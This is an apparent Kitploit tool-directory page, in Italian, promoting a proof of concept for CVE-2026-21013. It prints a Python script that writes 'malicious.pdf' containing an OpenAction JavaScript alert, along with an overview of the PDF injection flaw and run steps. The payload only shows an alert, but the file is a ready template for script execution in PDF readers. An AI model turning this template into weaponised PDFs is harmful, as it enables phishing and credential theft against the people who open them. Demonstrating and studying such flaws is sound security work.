Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script — Genera un PDF con JavaScript incorporato per dimostrare CVE-2026-21013, un'iniezione OpenAction che porta all'esecuzione di script nei lettori PDF vulnerabili. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
Generazione di PayloadAnalisi delle VulnerabilitàExploitSicurezza Web
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

Genera un PDF con JavaScript incorporato per dimostrare CVE-2026-21013, un'iniezione OpenAction che porta all'esecuzione di script nei lettori PDF vulnerabili.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
21 mese faNon ancora revisionato
Condividi

CVE-2026-21013 – Iniezione JavaScript in PDF tramite script incorporato

Codice del programma (Python che genera un PDF malevolo)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – Iniezione JavaScript in PDF tramite OpenAction

Severity: Medium

Panoramica

Un generatore di PDF non sanifica i contenuti forniti dall'utente prima di incorporarli nel file PDF. Un attaccante può iniettare una voce JavaScript /OpenAction che viene eseguita all'apertura del documento, portando a cross-site scripting (nei visualizzatori web) o all'esecuzione locale di codice (nei lettori desktop con supporto JavaScript completo).

Dettagli della vulnerabilità

  • Tipo: Iniezione PDF / Esecuzione di codice lato client
  • Impatto: Phishing, furto di credenziali, distribuzione di malware.
  • Causa principale: La libreria PDF incorpora direttamente stringhe controllate dall'attaccante nella struttura PDF senza escaping o validazione.

Dimostrazione dell'exploit

Esegui il generatore:

root@kitploit:~
python generate_pdf_js_inject.py

Apri il file malicious.pdf risultante in un lettore PDF che supporti JavaScript; apparirà una finestra di avviso.

Scarica lo strumento